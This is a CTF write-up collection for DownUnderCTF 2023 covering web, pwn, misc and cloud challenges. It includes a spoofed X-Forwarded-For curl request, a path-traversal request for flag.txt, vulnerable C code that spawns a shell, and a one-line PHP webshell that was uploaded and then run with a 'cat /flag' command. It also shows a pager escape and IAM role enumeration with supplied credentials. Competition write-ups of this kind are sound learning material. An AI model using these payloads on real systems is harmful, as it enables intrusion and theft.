DownUnderCTF 2023

Proxed

Read source code, knowing that we need to add X-Forwarded-For: 31.33.33.7 to header. Then refresh to get flag.

Solve script:

#!/usr/bin/env bash
curl -H "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/;
echo

Discord

The flag is the first character of every word in the sentence at the final second of the video in #rules.

𝕏

There are 12 pics in total, each of them has a part of the flag. Gather all of them, we have:

DUCTF{ Tha nksE l0nW tter eCantC all1t TheTw1 Fl4g N0w}

since Wtter is not a valid word, after correcting I get:

DUCTF{ThanksEl0nWeCantCall1tTheTw1tterFl4gN0w}

Welcome to DUCTF!

After un-upsidedown the text, we got:

You've heard of C++ but can I introduce you to the better, faster, more profanity inclusive Aussie Plus Plus˙

Featuring fantastic features like, Hard Yakka, YEAH NAH!, Going WALkAbOUT and I rECkON you can GIMME˙ ſust take this code here and run it through the interpreter and it'll print you out the flag!

Aussie Plus Plus is actually a programming language, paste the snippet in the attachment file to this site and execute to get flag.

static file server

Just HTML-encode the relative path (../../../../flag.txt) and use in the request.

blinkybill

Listening to the attachment, I know this is definitely Morse code but I am unable to use online Morse code translator online since there is some background music. Viewing this file's spectogram in Audacity, I got:

At this point, the short dash is a dot, the longer one is a hyphen. Translate that and we got the flag.

downunderflow

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USERNAME_LEN 6
#define NUM_USERS 8
char logins[NUM_USERS][USERNAME_LEN] = { "user0", "user1", "user2", "user3", "user4", "user5", "user6", "admin" };

void init() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

int read_int_lower_than(int bound) {
    int x;
    scanf("%d", &x);
    if(x >= bound) {
        puts("Invalid input!");
        exit(1);
    }
    return x;
}

int main() {
    init();

    printf("Select user to log in as: ");
    unsigned short idx = read_int_lower_than(NUM_USERS - 1);
    printf("Logging in as %s\n", logins[idx]);
    if(strncmp(logins[idx], "admin", 5) == 0) {
        puts("Welcome admin.");
        system("/bin/sh");
    } else {
        system("/bin/date");
    }
}

The vulnerability is scanf("%d", &x), the int data type has the limit of [-2147483647, 2147483647].

The solve script:

xxd-server

Some valuable information in the source code:

• PHP files are executable

# Everything not a PHP file, should be served as text/plain
<FilesMatch "\.(?!(php)$)([^.]*)$">
    ForceType text/plain
</FilesMatch>

• Everything we upload are preserved, no filter or sanitization happens.

So I just need to upload a PHP webshell to interact with the server, however, if the payload is too long (exceed 1 line in the xxd CLI interface), it will cause error.

My payload:

<?=`$_GET[0]`;?>

# XXD result
# 00000000: 3c3f 3d60 245f 4745 545b 305d 603b 3f3e  <?=`$_GET[0]`;?>
# 00000010: 0a

After that, interact with server:

teebow1e@teebow1e:/mnt/c/Users/teebow1e$ curl https://web-xxd-server-2680de9c070f.2023.ductf.dev/uploads/b1596a24046084d8/a.php?0=cat+/flag

00000000: 3c3f 3d60 245f 4745 545b 305d 603b 3f3e  DUCTF{00000000__7368_656c_6c64_5f77_6974_685f_7878_6421__shelld_with_xxd!}00000010: 0a

helpless

Basically, the help() interface is a less binary, so when I pressed H, I got the manual page. Inside, it shows that :e is read a file. So I can easily read the flag.

Solve script:

// Some code

Make sure to smash your keyboard in restricted environment, you may find special interaction!

needle in iam

It appears that the credentials.json file and the given command all refer to the Google Cloud CLI, i install it then authenticated with the creds file using this command:

gcloud auth login --cred-file=credentials.json

Using gcloud iam roles describe ComputeOperator --project=needle-in-iam, can confirm that this account does not have enough permission, however, I can list all roles in this project and then grep the flag.

teebow1e@teebow1e:~$ gcloud iam roles list --project=needle-in-iam | grep DUCTF
description: DUCTF{D3scr1be_L1ST_Wh4ts_th3_d1fference_FDyIMbnDmX}

pyny

Since I am unable to understand what is happening or unable to compile into a single binary to reverse, I decided to hook a gdb into the running python scripts.